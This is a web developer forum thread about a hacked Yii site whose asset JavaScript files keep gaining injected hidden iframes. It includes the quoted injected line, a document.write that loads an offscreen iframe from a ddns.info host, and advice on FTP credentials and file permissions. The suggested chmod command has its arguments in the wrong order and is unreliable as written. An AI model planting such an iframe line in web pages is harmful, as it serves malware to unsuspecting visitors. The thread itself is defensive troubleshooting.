Urgent, Iframes Being Inserted Into Yii Extensions

Hi guys. A Few days ago, my site was detected by google as disseminator of malware with a red screen and if the user wanted to continue anyway or not. I found the tool "Webmasters tools" and added my site. That tool found me that file that was detected as threat and was the jnotify.js(Jnotity extension, inside assets directory).

I looked inside the file and i noticed that there was an iframe at the end of the file with a strange url. So, i exclude the extension because i was not using and i asked google a review and the problem was solved. But, many users were sending me email that the anti-virus was detecting threats in many js files inside the asses diretory.

I looked inside them and again i noticed that there was an iframe at the end of the file but with google url "http://google.com", so i removed all iframes inside the files but that iframes at the end of the files appeared again so i exclude all directory inside the asses diretory and apparently the problem was solved.

Today, i receive and email with the diagnosis of the anti-virus showing the same files was detected as threat at second time. The url with iframes is: http://cvrtyi.ddns.info.

I dont know what or who are entering these malicious iframes end of javascript files in the folder assets. Please, someone help me to solve this problem.


Just to add information. This is the code being entered:

document.write('<iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs.ddns.info/nighttrend.cgi?8"></iframe>  ');

This is a hidden iframe "injection" attack. Validate your file permissions are correct and also that your FTP credentials have not been compromised. The last time I dealt with this the FTP account credentials were compromised and the files were being modified that way. There are other ways this could be happening, but that is the most likely. Check your logs to confirm.


Thank you very much!

The problem that the assets diretory need permission to write and it is precisely in this directory that the files are being modified. The octavel this directory is set as: rwxrwxrwx.

That´s right?

What do you mean it needs permission to write?! Your users don’t have to have write access to this directory. You should change its permission to rwxr-xr-x. If your host is linux then you can run this command to make that happen:

chmod -R assets 755

Hi guys. I solved the problem changing all passwords the ftp client and the permissions the app files. I deleted the app that was in production and i uploaded another clean one. Never more i will use Microsoft windows again, because my pc was infected by a trojan that caused this nightmare. My tip is, do not use microsoft windows computers that access the application server.

Thank you guys for your replies.